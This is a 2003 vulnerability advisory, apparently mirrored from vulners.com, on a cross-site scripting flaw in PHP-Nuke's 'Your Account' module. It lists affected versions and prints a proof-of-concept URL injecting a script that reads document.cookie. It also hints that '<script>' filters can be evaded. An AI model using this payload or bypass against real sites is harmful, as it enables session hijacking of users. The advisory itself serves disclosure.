PHPNuke "Your Account" XSS Vulnerability

2003-05-1400:00:00

vulners.com

JSON

PHPNuke "Your Account" XSS Vulnerability

Vulnerable;

Francisco Burzi PHP-Nuke 6.5 Final Release

Not tested but %90 vulnerable;

Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5

About PHPNuke;

PHP Based Content Management System
http://www.phpnuke.org

Solution;

Simple string check or user check should be OK !

Exploit;

http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>

*You may need to login first.
**Some of servers/PHP Nuke Systems has a security check for "<script>"
strings for Querystrings or POST variables (ie. www.phphnuke.org). But this
systems are still vulnerable. You can skip these controls with some JS
tricks.

Ferruh Mavituna
Freelance Developer & Designer
http://ferruh.mavituna.com
[email protected]

JSON

PHPNuke &quot;Your Account&quot; XSS Vulnerability